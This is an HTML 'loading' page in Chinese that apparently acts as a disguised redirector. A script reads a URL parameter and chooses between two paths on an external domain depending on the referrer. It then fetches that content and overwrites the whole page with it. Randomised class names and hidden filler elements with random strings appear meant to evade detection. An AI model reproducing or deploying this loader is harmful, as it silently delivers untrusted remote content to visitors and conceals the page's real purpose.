<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .BshBP6x0da {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .BshBP6x0da .NTXHTGq {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .BshBP6x0da .content {
            line-height: 50px;
            text-align: center
        }

        .BshBP6x0da .img {
            width: 100%
        }

        .BshBP6x0da .VuyEL3j2L {
            text-align: center
        }

        .BshBP6x0da .VuyEL3j2L span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .BshBP6x0da .VuyEL3j2L span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .BshBP6x0da .VuyEL3j2L span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .BshBP6x0da .VuyEL3j2L span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .BshBP6x0da .VuyEL3j2L span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .BshBP6x0da .VuyEL3j2L span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .BshBP6x0da .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function hPkeCE4grjf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var hbJySo = hPkeCE4grjf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ hbJySo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ hbJySo +".html?a=share";
		}
		
        traEzFEWy=url+"#"+new Date().getTime();
        traEzFEWy && function() {
            $.get(traEzFEWy, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<h1 style='display:none' >ngoss3Ay3RD0EX4Dzq9foua1htEeCIZVCdJTKLO2L35z6bnePDlJVv2Edy7w9Ch6g5vdH7p5HC</h1>
<a  href='#' style='display:none'>Dw3b7mqeiQKawnK66accyNRhFfBAix9vnK7pM6SpRpzdzvOLfdASQWtl4eC0Ew9VXG3s9futSuxR7SlG</a>
<li style='display:none' >pmkfynYCb5FiDF6jRRHdoJpzCf7dk</li><div class="BshBP6x0da">
    <div class="NTXHTGq">
        <div class="VuyEL3j2L">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<h1 style='display:none' >lkZbyKtz9kWVWNULgmVC1ETu9a</h1>
<img  src='' style='display:none'>
<ul style='display:none' >Y2TKDzmKUYC5kZP</ul>
<div style='display:none'>tRsTQlNAlwvHkuOoy0TeuZKUqKUXCnG</div>
<ul style='display:none' >Y2TKDzmKUYC5kZP</ul>
<li style='display:none' >ajRtGHlS6vMNmevuDedYDIooeI</li></body>
</html>